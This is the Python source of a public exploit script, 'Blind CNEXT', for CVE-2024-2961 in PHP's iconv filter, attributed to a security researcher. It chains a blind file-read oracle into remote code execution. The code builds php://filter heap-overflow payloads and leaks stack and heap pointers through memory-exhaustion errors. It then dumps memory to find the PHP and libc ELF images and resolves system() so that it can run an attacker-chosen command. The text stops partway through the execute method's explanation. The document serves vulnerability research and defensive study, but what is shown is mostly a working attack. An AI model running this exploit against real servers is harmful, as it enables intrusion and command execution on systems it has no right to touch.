README.md
Rendering markdown...
#!/usr/bin/env python3
#
# Blind CNEXT: Blind PHP file read to RCE (CVE-2024-2961)
# Date: 2024-09-30
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload
# and how to verify that the blowup happened, i.e. that PHP went OOM.
#
# TODO
#
# If you feel like improving the exploit, please submit a PR. Here are some improvement
# ideas:
#
# - Automatic configuration of the oracle
# - Handle multithreading
# - Handle non-PIE ELFs
# - Properly handle ELF endianness
# - Use the libc's Build ID to find system faster
# - Verify that we properly dump addresses that contain newline characters
#
# DEBUGGING
#
# This exploit is complex, and I may have made mistakes. Although it is built not to
# crash, it is a binary exploit, so it might anyway.
#
# If you encounter any issue, please provide the following information:
#
# - The full output of the exploit, with the `-d` flag
# - The exact code of the PHP page that is being attacked, or better, a docker image
#
# Unless I see both, issues will be automatically closed.
#
#
# TECHNICAL
#
# The exploit is a blind file read to RCE in PHP, using the iconv filter. Its behavior
# is documented in the following blog posts:
#
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p1
# https://www.ambionics.io/blog/iconv-cve-2024-2961-p3
#
from __future__ import annotations
import base64
import itertools
import zlib
from collections import Counter
from dataclasses import dataclass, field
from typing import NoReturn
from requests.exceptions import ConnectionError, ChunkedEncodingError
import time
from rich.align import Align
from rich.rule import Rule
from ten import *
import struct
set_message_formatter("Icon")
# sys.path.append(os.path.join(os.path.dirname(__file__), "php_filter_chains_oracle_exploit"))
from php_filter_chains_oracle_exploit.filters_chain_oracle.core.bruteforcer import (
Bruteforcer,
)
MAX_COMPRESSED_LEN = 1500
MAX_PATH_LEN = 9000
from tenlib import logging
# -- Constants
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
MIN_NB_400_CHUNKS = 100
CS = 0x400 # bin=23, chunks=8, pages=2
ZERO_CHUNK = b"0" * CS
ZERO_CHUNK_30 = b"0" * 0x30
NB_30_CHUNKS = 85 * 5
NB_30_CHUNKS_2 = NB_30_CHUNKS + 85 * 5
PAGE_SIZE = 0x1000
PHP_ELF_MIN_PAGE_DISTANCE = 1500
PHP_ELF_MAX_PAGE_DISTANCE = 3000
class Remote:
"""A helper class to send the payload and check whether a blowup happened.
The logic of the exploit is always the same, but the exploit needs to know how to
send the payload and how to check if a blowup happened. A blowup is when PHP tries
to allocate too much memory and returns an error such as:
Allowed memory size of 134217728 bytes exhausted
The code here serves as an example that attacks a page that looks like:
```php
<?php
ini_set('display_errors', 1);
file_get_contents($_POST['file']);
```
Tweak it to fit your target, and start the exploit.
"""
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def oracle(self, path: str) -> bool:
"""Sends given `path` to the HTTP server. Returns whether a blowup happened."""
write("/tmp/payload", path)
try:
response = self.session.post(self.url, data={"file": path})
except ConnectionError:
raise RuntimeError("Connection error, server crashed or timeout!")
return response.contains("Allowed memory size of")
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("alignment", "Number of 0x400 chunks to spawn so that we overflow into the penultimate one of a page.")
@arg("brig_inp", "Address of the brig_inp variable on the stack.")
@arg("heap", "Address of the zend_mm_heap object.")
@arg("php_elf", "Address of the PHP ELF in memory.")
@arg("zval_ptr_dtor", "Address of `zval_ptr_dtor` in memory.")
@arg("libc_elf", "Address of the libc ELF in memory.")
@arg("system", "Address of the `system` function in the libc.")
@arg("malloc", "Address of the `malloc` function in the libc.")
@arg("realloc", "Address of the `realloc` function in the libc.")
@arg("debug", "Display DEBUG log messages in the CLI.")
@dataclass
class Exploit:
"""Blind CNEXT exploit: RCE using a blind file read primitive in PHP, using CVE-2024-2961.
cfreal @ LEXFO/AMBIONICS
"""
url: str
command: str
alignment: int = None
brig_inp: str = None
heap: str = None
php_elf: str = None
zval_ptr_dtor: str = None
libc_elf: str = None
system: str = None
malloc: str = None
realloc: str = None
sleep: int = 1
debug: bool = False
BLOW_UP_UTF32 = "convert.iconv.L1.UCS-4"
BLOW_UP_INFINITY = [BLOW_UP_UTF32] * 15
# TODO Is it really needed now?
FILTER_USAGE = (
# Base filters
Counter(
{
"zlib.inflate": 3,
"dechunk": 5,
"convert.iconv.L1.L1": 2,
"convert.iconv.UTF-8.ISO-2022-CN-EXT": 1,
"zlib.deflate": 1,
"convert.base64-encode": 1,
}
)
# Character selection
+ Counter(
{
# "convert.base64-decode": 70,
# "convert.base64-encode": 70,
"convert.iconv.UTF8.CSISO2022KR": 42,
"convert.iconv.JS.UNICODE": 14,
"convert.iconv.L4.UCS2": 14,
"convert.iconv.UTF-16LE.UTF-16BE": 8,
"convert.iconv.UCS-4LE.UCS-4": 8,
"convert.iconv.L1.UTF7": 6,
}
)
# Other script
+ Counter(
{
"dechunk": 1,
"convert.iconv.L1.UCS-4": 15,
"convert.iconv.437.CP930": 6,
"convert.quoted-printable-encode": 5,
"convert.iconv..UTF7": 5,
"convert.base64-decode": 5,
"convert.base64-encode": 6,
"string.tolower": 2,
"convert.iconv.CSISO5427CYRILLIC.855": 1,
"convert.iconv.CP1390.CSIBM932": 5, # was 1, bumped to 5
"string.rot13": 2,
"convert.iconv.CP285.CP280": 1,
"string.toupper": 1,
"convert.iconv.CP273.CP1122": 1,
"convert.iconv.500.1026": 1,
"convert.iconv.UTF8.IBM1140": 1,
"convert.iconv.CSUNICODE.UCS-2BE": 1,
"convert.iconv.UTF8.CP930": 1,
}
)
)
# FILTER_USAGE = Counter()
# Oracle tests to determine if the base64 digit is what we expect
FAST_PATH = {
"f": [
(False, ["convert.iconv.CP1390.CSIBM932"] * 5),
(False, []),
],
"g": [
(False, ["convert.iconv.CP1390.CSIBM932"]),
(True, []),
],
"A": [
(
False,
[
"string.tolower",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
],
),
(
True,
[
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
"convert.quoted-printable-encode",
"convert.iconv..UTF7",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.437.CP930",
],
),
],
"B": [
(False, ["string.tolower", "convert.iconv.CP1390.CSIBM932"]),
(
True,
[
"string.tolower",
"convert.iconv.CP1390.CSIBM932",
"convert.iconv.CP1390.CSIBM932",
],
),
(True, ["convert.iconv.CP1390.CSIBM932"]),
],
}
def __post_init__(self) -> None:
self.remote = Remote(self.url)
self.logger = logger("EXPLOIT")
self.info = {}
#
# Building and sending payload
#
def _get_response(self, filters: list[str], resource: str) -> Response:
path = self._build_filter_payload(filters, resource)
response = self.remote.oracle(path)
log.trace(
f"Sending {len(path):#x} payload results in a response of {len(response.content)} bytes"
)
return response
def oracle(self, filters: list[str], resource: str) -> bool:
"""Returns true if the expansion happened, false otherwise."""
path = self._build_filter_payload(filters, resource)
blowup = self.remote.oracle(path)
self.logger.trace(f"Sending payload of size {len(path)} results in {blowup=}")
return blowup
def _build_filter_payload(self, filters: list[str], resource: str) -> str:
read = "|".join(filters)
write = self._compute_write(filters)
path = f"php://filter/read={read}/write={write}/resource={resource}"
return path
@classmethod
def _compute_write(cls, filters: list[str]) -> str:
"""To make sure that the heap does not change too much, we add dummy filters so
that PHP creates the associated structures. They do not impact our exploit, as
they are write filters. However, they will be called when the stream is finally
freed, at the end of the execution. We thus convert any funky charset to latin1,
to make sure PHP does not report errors. This also makes sure that the length of
the path is always the same.
Although this is very helpful, this is not perfect. The order in which the
filters are created matters as well. However, we cannot control this perfectly.
"""
filters = Counter(filters)
missing = []
for filter, number in cls.FILTER_USAGE.items():
used = filters.get(filter, 0)
if filter.startswith("convert.iconv."):
_, _, ffrom, fto = filter.split(".")
if len(ffrom) >= 2:
ffrom = "L1".ljust(len(ffrom), " ")
if len(fto) >= 2:
fto = "L1".ljust(len(fto), " ")
filter = f"convert.iconv.{ffrom}.{fto}"
if used < number:
missing += [filter] * (number - used)
# assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE))
return "|".join(missing)
#
# Exploit logic
#
def find_chunk_alignment(self) -> int:
"""Determines the required number of 0x400 chunks to overflow into the
penultimate one, yielding a A->B->C' chain with C overflowing into the next
page.
"""
assert self.alignment is None
# We should only need 8, in theory, but this won't hurt too much
for i in track(
range(MIN_NB_400_CHUNKS, MIN_NB_400_CHUNKS + 8),
"Looking for chunk alignment",
):
if self._try_big_chunks_alignment(i):
break
else:
# TODO CHECK IF VULNERABLE
failure("Unable to find heap alignment; is the target vulnerable?")
msg_success(f"Found alignment for [i]0x400[/] chunks: {i} {option_help('-a')}")
self.alignment = i
def _try_big_chunks_alignment(self, alignment: int) -> bool:
# After the overflow, PHP will allocate a chunk twice as big to store the iconv'
# ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
# the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
# will break the logic of the code (the `dechunk` that comes right after will
# fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
# that will be the head of the FL.
step1_800 = [b"0" * CS * 2]
step1_400 = [ZERO_CHUNK] * alignment
step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)
PTR_CHUNK = bytearray(ZERO_CHUNK)
put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
step2 = self.build_conserved_chunks(step2, step=2)
# Overflow step
step3_overflow = bytearray(b"0" * CS)
put(step3_overflow, -len(BUG), BUG)
put(step3_overflow, -len(BUG) - 3, b"1e-")
tapis = bytearray(b"T" * CS)
put(tapis, -0x48 + 0x30 - 5, b"\na\nff" + p64(0) + b"\nAAABBBB" + p64(0))
end_chunk = bytearray(b"E" * CS)
put(end_chunk, 0, b"\nX\n")
step3 = (
[step3_overflow]
+ [b"0"]
+ [ZERO_CHUNK] * 2
+ [tapis]
+ [end_chunk]
+ [b"3" * 0x30] * (NB_30_CHUNKS_2)
)
step3 = self.build_conserved_chunks(step3, step=4)
pages = b"" + step1 + step2 + step3
resource = self._data_to_resource(pages)
base_filters = (
Filters.base(3)
# Step 5: Remove data if possible
+ [
"dechunk",
"dechunk",
"dechunk",
]
+ self.BLOW_UP_INFINITY
)
return self.oracle(base_filters, resource)
def dump_memory(self, address: int, size: int, message: str = None) -> None:
"""Dumps `size` bytes of memory at `address`.
"""
total = b""
if message:
message = message.format(address=address, size=size)
generator = lambda: track(range(0, size, 3), message)
else:
generator = lambda: range(0, size, 3)
for p in generator():
hope = self.dump_3(address + p, nb_bytes=size - p)
total += base64.decode(hope)
# print(hexdump(total, total=False))
return total
def expect_memory(self, address: int, expected: bytes) -> bool:
"""Returns true if the memory at `address` matches the `expected` bytes.
"""
size = len(expected)
for p in range(0, size, 3):
try:
self.dump_3(address + p, expected=expected[p : p + 3])
except UnexpectedBytesException:
return False
return True
def _maybe_convert_arguments(self) -> None:
for attr in ("brig_inp", "heap", "zval_ptr_dtor", "php_elf", "libc_elf", "system", "malloc", "realloc"):
value = getattr(self, attr)
if value is not None:
setattr(self, attr, unhex(value))
def run(self) -> None:
if self.debug:
logging.set_cli_level("DEBUG")
self._maybe_convert_arguments()
got_final_params = self.heap and self.system and self.malloc and self.realloc
# We need to find out at least one parameter before we can execute code
if not got_final_params:
# Do we have everything we need to perform arbitrary reads?
if not self.alignment or not self.brig_inp:
msg_print(Rule("READ PRIMITIVE"))
if not self.alignment:
self.find_chunk_alignment()
if not self.brig_inp:
self.leak_stack_address()
# Do we have the heap? If we do, do we need to find the PHP ELF ?
if not self.heap or not (self.system or self.libc_elf or self.php_elf or self.zval_ptr_dtor):
msg_print(Rule("HEAP"))
if not self.heap:
self.find_heap_address()
if not self.zval_ptr_dtor:
self.find_zval_ptr_dtor()
# Do we have the PHP ELF? If we don't, do we need it?
if not (self.php_elf or self.libc_elf or self.system):
msg_print(Rule("PHP ELF"))
self.find_php_elf()
address = self.find_some_libc_function()
if not self.libc_elf:
msg_print(Rule("LIBC ELF"))
self.find_libc_elf(address)
self.find_libc_functions()
msg_print(Rule("CODE EXECUTION"))
self.execute()
def find_some_libc_function(self) -> int:
php = ELFDumper(self, self.php_elf)
php.get_dynamic_section()
php.get_dynamic_segments("STRTAB", "SYMTAB", "JMPREL")
return php.find_some_libc_function()
def find_libc_elf(self, address: int):
"""Finds the address of the libc ELF in memory from a function it contains.
"""
assert self.libc_elf is None
libc = self._find_elf_header(address, 0, PHP_ELF_MAX_PAGE_DISTANCE)
msg_success(f"Found [i]libc[/] ELF at {addr(libc)} {option_help('-l')}")
self.libc_elf = libc
def find_libc_functions(self) -> None:
assert self.system is None
elf = ELFDumper(self, self.libc_elf)
elf.setup_gnu_hash()
for symbol in ("system", "malloc", "realloc"):
try:
function = elf.find_symbol_from_hash(symbol)
except ValueError as e:
failure(str(e))
function += elf.base
shortcut = f"-{symbol[0]}"
msg_success(f"Found [i]{symbol}@libc[/] at address {addr(function)} {option_help(shortcut)}")
setattr(self, symbol, function)
def russian_doll(self, payload: bytes, *sizes) -> bytes:
"""Returns a payload that, when successively dechunked, has its size changed to
`sizes`.
"""
for size in sizes:
if size < 0:
size = len(payload) - size
elif size == 0:
size = len(payload) + 8
payload = chunked_chunk(payload, size)
payload = compressed_bucket(payload)
return payload
def _data_to_resource(self, data: bytes) -> str:
"""Converts the given bytes to a `data://` url. Compresses the input twice."""
resource = compress(compress(data))
if len(resource) > MAX_COMPRESSED_LEN:
failure(f"Resource too big: {len(resource)} > {MAX_COMPRESSED_LEN}")
# resource = resource.ljust(MAX_COMPRESSED_LEN, b"A")
# The resource will be B64-decoded into a zend_string, so we need to make sure
# that this does not account to a zend_string of size 0x400, which would mess
# with our setup.
resource = resource.ljust(0x400, b"\x00")
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
return resource
def ptr_bucket(self, *ptrs, size: int, strip: int = 0) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
bucket = b"".join(map(p64, ptrs))
if strip:
bucket = bucket[:-strip]
if size is not None:
assert len(bucket) == size, f"{len(bucket):#x} != {size=:#x}"
bucket = qpe(bucket)
bucket = self.russian_doll(bucket, 0, 0, 0)
return bucket
def leak_stack_address(self):
"""Overwrites a buffer that we control with a php_stream_bucket structure and
uses it to leak the address of the stack.
The general idea is to displace the last 0x400 chunk of a page, allocate it,
and then allocate buckets in the page right after. Buckets get "imprinted" into
the chunk, and we can then extract the pointers.
A naive implementation, although very small, easy to understand, and classy, may
yield crashes in 1/8 cases. If we overflow from the penultimate 0x400 chunk, we
overwrite a pointer to NULL, and the upcoming allocation crashes. We can avoid
this by first setting up the freelist (ensuring there are enough chunks), then
doing the process. It greatly complexifies the exploit, because now we need to
allocate lots chunks of size 0x30 right after we setup the 0x400 FL (step1), but
then free them all before we overflow and displace the chunk, so that we can
finally reallocate them, and have them be imprinted into the chunk. It's all a
matter of doing things in order: we want to setup our heap, then clear it, and
then imprint the buckets. The "naive" payload is twice as big (2000 against
1000) but it avoids crashes. We're doing web stuff, we don't want crashes.
"""
assert self.brig_inp is None
# After the overflow, PHP will allocate a chunk twice as big to store the iconv'
# ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in
# the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it
# will break the logic of the code (the `dechunk` that comes right after will
# fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
# that will be the head of the FL.
step1_800 = [b"0" * CS * 2]
step1_400 = [ZERO_CHUNK] * self.alignment
step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1)
PTR_CHUNK = bytearray(ZERO_CHUNK)
put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
step2 = self.build_conserved_chunks(step2, step=2)
# Overflow step
step3_overflow = bytearray(b"0" * CS)
put(step3_overflow, -len(BUG), BUG)
put(step3_overflow, -len(BUG) - 3, b"1b-")
tapis = bytearray(b"T" * CS)
put(tapis, -0x48 + 0x30 - 1, b"\n")
put(tapis, -0x48 + 0x30, p64(0))
end_chunk = bytearray(b"E" * CS)
put(end_chunk, 3, b"\n")
step3 = (
[step3_overflow]
+ [b"0"]
+ [ZERO_CHUNK] * 2
+ [tapis]
+ [end_chunk]
# protect misplaced chunk from being used
+ [ZERO_CHUNK] * 2
+ [b"3" * 0x30] * (NB_30_CHUNKS_2)
)
step3 = self.build_conserved_chunks(step3, step=4)
pages = b"" + step1 + step2 + step3
resource = self._data_to_resource(pages)
base_filters = Filters.base(3) + [
"dechunk",
"convert.base64-encode",
]
full_dump = ""
resource = self._data_to_resource(pages)
wanted_digits = range(21, 28)
for i in track(
wanted_digits,
"Extracting stack pointer",
):
# Build a list of filters that puts the character we're interested in in
# front
quartet, digit = divmod(i, 4)
quartet_filters = (Filters.REMOVE_EQUALS + Filters.DITCH_4) * quartet
digit_filters = Filters.QUARTET_DIGITS[digit] + quartet_filters[1:]
digit_filters = base_filters + digit_filters
bruteforcer = LinkedBruteforcer(self, digit_filters, resource)
for digit, _ in bruteforcer.bruteforce():
full_dump += digit
break
else:
failure("Unable to find character")
pointer_part = base64.decode("A" + full_dump)[1:]
brig_inp = u64(pointer_part + b"\x7f\x00\x00")
brig_inp = brig_inp + 0x10
msg_success(f"Got (stack) address of [i]brig_inp[/]: {addr(brig_inp)} {option_help('-b')}")
self.brig_inp = brig_inp
def _build_bucket(self, address: int, size: int) -> bytes:
"""Builds a bucket whose buffer has size `size` and points to the given
`address`.
"""
return b"".join(
map(
p64,
[
0x00, # next
0x00, # prev
self.brig_inp, # brigade
address, # buf
size, # len
0x10_0000_00_00, # refcount hole is_persistent own_buf
],
)
)
def find_heap_address(self) -> None:
"""Reads the stack to extract a pointer to a bucket, and then leaks the address
of the zend_mm_heap object.
"""
assert self.heap is None
md = MemoryDumper(self, 0)
(bucket,) = md.unpack(
self.brig_inp - 0x10, "<Q", message="Leaking bucket address from [i]brig_inp[/]"
)
msg_info(f"Leaked bucket address: {addr(bucket)}")
chunk = bucket & ~(0x200000 - 1)
if bucket == 0:
failure("Cannot leak heap address: bucket is NULL")
(heap,) = md.unpack(
chunk, "<Q", message="Leaking [i]zend_mm_heap[/] from heap chunk"
)
msg_success(f"Leaked [i]zend_mm_heap[/]: {addr(heap)} {option_help('-H')}")
self.heap = heap
def _try_fast_path(self, filters: list[str], resource: str, expected_digit: str) -> None | NoReturn:
"""Uses the fast_path tests to determine if the digit is `expected_digit`.
"""
fast_path = self.FAST_PATH[expected_digit]
for keep_if_blow, test_filters in fast_path:
test_filters = (
filters + test_filters + ["dechunk"] + self.BLOW_UP_INFINITY
)
blew_up = self.oracle(test_filters, resource)
if keep_if_blow != blew_up:
break
else:
self.logger.trace(f"Fast path hit for digit {expected_digit}")
return
self.logger.trace(f"Fast path missed for digit {expected_digit}")
raise UnexpectedBytesException()
def dump_3(self, address: int, expected: str = None, nb_bytes: int = 3) -> None:
"""Dumps 3 bytes (4 base64 digits) from `address`."""
# In step 1, we allocate lots of 0x400 chunks to setup the heap, and then right
# after we allocate 0x30 chunks. The latter will stay, while the former will be
# removed on the next step.
# After the overflow, PHP will allocate a chunk twice as big to store the iconv'
# ed buffer. Since there was a one byte overflow, the byte at offset 0x400 in
# the new out_buf (of size 0x800) will keep its value. If this value is 0x0A, it
# will break the logic of the code (the `dechunk` that comes right after will
# fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200
# that will be the head of the FL.
step1_800 = [b"0" * CS * 2]
step1_400 = [ZERO_CHUNK] * self.alignment
step1 = self.build_conserved_chunks(step1_800 + step1_400, step=1)
step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS
step1_30 = self.build_conserved_chunks(step1_30, dechunks=2)
step1 += step1_30
# In step 2, we put a NULL pointer in the last chunk of the page, and then we
# reverse the free list for 3 elements A B C. The 0x30 chunks do not move.
# We make the chunk that contains the fake pointer a doubly-chunked chunk, so
# that we don't break the dechunk chain
PTR_CHUNK = bytearray(ZERO_CHUNK)
put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n")
step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2
step2 = self.build_conserved_chunks(step2, step=2)
# In step 3, we overflow from A into B to change its next pointer to C+48h.
step3_overflow = bytearray(ZERO_CHUNK)
put(step3_overflow, -len(BUG), BUG)
put(step3_overflow, -len(BUG) - 4, b"1b-")
step3 = [step3_overflow, b"0"]
step3 = self.build_conserved_chunks(step3, step=3)
# In step 4, we overwrite a bucket
BUCKET = self._build_bucket(address, 3)
# TODO for loop this
# TODO properly implemented?
newlines = BUCKET.count(b"\x0a")
match newlines:
case 0:
prefix = b"ffff-"
case 1:
prefix = b"5\nffff-\nffff-"
case 2:
prefix = b"d\n5\nffff-\nffff-\nffff-"
case _:
msg_debug("Leaking addresses that contain more than 2 newlines is DOABLE, just not implemented yet")
failure("Cannot leak address: contains too many newlines")
dechunks = ["dechunk"] * (newlines + 1)
# Every chunk created here will preceed the data we want to leak. We need to
# make it dechunkable. If addresses didn't contain newlines, it would be easy
# enough.
step5_overwrite_bucket = bytearray(ZERO_CHUNK)
put(step5_overwrite_bucket, -0x48, BUCKET)
put(step5_overwrite_bucket, -0x48-len(prefix), prefix)
# Get rid of the last bytes: we don't want to overwrite the second bucket of
# the page
step5_overwrite_bucket = step5_overwrite_bucket[:-0x18]
# Final chunk: directly preceeds the leaked data
final = bytearray(ZERO_CHUNK)
put(final, -1, b"\n")
step5 = [ZERO_CHUNK, ZERO_CHUNK, step5_overwrite_bucket, ZERO_CHUNK, ZERO_CHUNK, ZERO_CHUNK, final]
step5 = [qpe(chunked_chunk(chunk, CS*2)) for chunk in step5]
step5 = self.build_conserved_chunks(step5, step=3)
step4 = b""
# Merge pages
pages = step5 + step4 + step1 + step2 + step3
resource = self._data_to_resource(pages)
base_filters = Filters.base(2) + [
"convert.iconv.L1.L1",
# Step 4: Overwrite buffer
"convert.quoted-printable-decode",
"dechunk",
"convert.iconv.L1.L1",
# Step 5: Remove the stuff preceding the leaked data
] + dechunks + [
# Step 6: Inprint the data
# "zlib.deflate",
# "zlib.inflate",
"convert.base64-encode",
]
# The four (or less, if nb_bytes if lower) characters that we need to dump
quartet = ""
# If some characters in the B64 quartet are expected, we can check if a fast
# path exists for them, and hit it instead of bruteforcing the digit and then
# comparing it to the expected value.
# b64_expected represents every B64 digit that is expected. We cannot
# naively convert to B64 because some bytes may be incomplete.
#
# Quick example: we expect b"Z", so we b64-encode and get "Wg==". In this, W
# encodes the first 6 bits of Z, and g the last 2. We cannot naively compare g
# with the second character of the leak, because the latter also encodes the 4
# first bits of the second byte of memory.
if expected:
b64_expected = b64(expected).decode()
match len(expected):
case 1:
b64_expected = b64_expected[:1]
case 2:
b64_expected = b64_expected[:2]
case 3:
pass
else:
b64_expected = ""
for i, get_digit in enumerate(Filters.QUARTET_DIGITS):
if len(quartet) > nb_bytes:
break
filters = base_filters + get_digit
if i < len(b64_expected) and b64_expected[i] in self.FAST_PATH:
base64_digit = b64_expected[i]
self._try_fast_path(filters, resource, base64_digit)
quartet += base64_digit
continue
bruteforcer = LinkedBruteforcer(self, filters, resource)
for digit, _ in bruteforcer.bruteforce():
break
else:
failure("Could not find the character")
quartet += digit
# We compare the size of a B64 to a normal byte array, but the comparison
# still holds.
if expected:
self._check_quartet_chunk_is_expected(quartet, expected)
if len(quartet) > len(expected):
break
self.logger.trace(f"Got quartet {quartet} for address {address:#x}")
return quartet.ljust(4, "=")
def _check_quartet_chunk_is_expected(
self, quartet: str, expected: bytes
) -> None | NoReturn:
"""Checks that the dumped quartet matches what is expected."""
digits = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b64_number(data: bytes) -> int:
return sum(
digits.index(digit) << (6 * (3 - i)) for i, digit in enumerate(data)
)
def number(data: bytes) -> int:
return sum(byte << (8 * (2 - i)) for i, byte in enumerate(data))
mask = 24 - min(len(expected) * 8, len(quartet) * 6)
mask = (1 << 24) - 1 - ((1 << mask) - 1)
number_quartets = b64_number(quartet) & mask
number_expected = number(expected) & mask
# print(f"{number_quartets=:24b}")
# print(f"{number_expected=:24b}")
# print(f" {mask=:24b}")
if number_quartets != number_expected:
self.logger.debug(
f"Expected {number_expected:03x} but got {number_quartets:03x}"
)
raise UnexpectedBytesException()
def build_conserved_chunks(
self, buckets: list[bytes], dechunks: int = 0, step: int = 1
) -> bytes:
"""Builds a list of chunks that will be conserved during the exploit."""
total_size = sum(map(len, buckets))
prefix = ""
suffix = b""
wraps = [0] * (step - 1)
for i in range(dechunks):
current_size = i * 8 + total_size
prefix = f"{current_size:06x}\n" + prefix
suffix += b"\n"
prefix = prefix.encode()
if prefix:
prefix = self.russian_doll(prefix, *wraps)
suffix = self.russian_doll(suffix, *wraps)
middle = b"".join(self.russian_doll(bucket, *wraps) for bucket in buckets)
return prefix + middle + suffix
def find_zval_ptr_dtor(self) -> int:
"""Finds the address of the `_zval_ptr_dtor` function in memory. To do so, we
look for a page that contains `zend_array` structures, and then we look for the
`pDestructor` field of the structure.
"""
assert self.zval_ptr_dtor is None
skip_until = 0
heap = MemoryDumper(self, self.heap)
for page in track(range(1, 512), "Looking for a [i]zend_array[/] page"):
if page < skip_until:
continue
offset = -0x40 + 0x0208 + 4 * page
(page_type,) = heap.dump(offset + 3, 1)
if page_type == 0x40:
(nb_pages,) = heap.unpack(offset, "<H")
skip_until = page + nb_pages
self.logger.debug(
f"Heap parsing, page #{page}: big allocation of {nb_pages} pages"
)
elif page_type == 0x80:
self.logger.debug(f"Heap parsing, page #{page}: small allocation")
# Find a page that contains arrays (0x38 has bin number 6)
value = heap.expect(offset, b"\x06")
if value:
self.logger.info(f"Heap parsing, page #{page}: 0x38 page")
msg_info(
f"Found first [i]zend_array (0x38)[/] page at [i]#{page}[/]"
)
page = heap.offset(-0x40 + PAGE_SIZE * page)
break
else:
failure("Unable to find [i]zend_array[/] page")
for p in track(range(0, 0x1000, 0x38), "Looking for [i]_zval_ptr_dtor[/]"):
# Check that the structure has type 7 (IS_ARRAY)
page.expect(p+4, b"\x07\x00\x00\x00")
# Extract the last pointer, pDestructor
(pointer,) = page.unpack(p + 0x30, "<Q")
self.logger.trace(f"Found potential zend_array, pDestructor: {pointer:#x}")
if pointer >> 40 in (0x7F, 0x55, 0x56):
msg_info(f"Found [i]_zval_ptr_dtor[/]: {addr(pointer)} {option_help('-z')}")
break
else:
failure("Unable to find [i]zval_ptr_dtor[/] in main heap")
self.zval_ptr_dtor = pointer
def _find_elf_header(self, address: int, min: int, max: int) -> int:
"""Finds the ELF header of a file given a function pointer."""
md = MemoryDumper(self, 0)
address = address & ~(PAGE_SIZE - 1)
distances = range(min, max)
for i in track(distances, "Looking for ELF header"):
page = address - PAGE_SIZE * i
if md.expect(page, b"\x7fELF"):
break
else:
failure("Unable to find ELF header")
return page
def find_php_elf(self) -> int:
"""Finds the PHP ELF file in memory. To do so, we find the first 0x38 page in
the heap. We expect it to contain zend_arrays, and therefore their PDestructor
field, which points to zval_ptr_dtor. We then look for the ELF header page by
page, starting from zval_ptr_dtor. It takes ages, and is actually what prompted
the implementation of the FAST_PATH.
"""
assert self.php_elf is None
address = self._find_elf_header(self.zval_ptr_dtor, PHP_ELF_MIN_PAGE_DISTANCE, PHP_ELF_MAX_PAGE_DISTANCE)
msg_success(f"Found PHP ELF header at {addr(address)} {option_help('-p')}")
self.php_elf = address
def execute(self) -> str:
"""On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.
Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.
The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:
... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00
By triggering the bug from chunk ..900, we get:
... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???
That's step 3.
Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.
Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:
0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900
We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.
Another problem comes up.
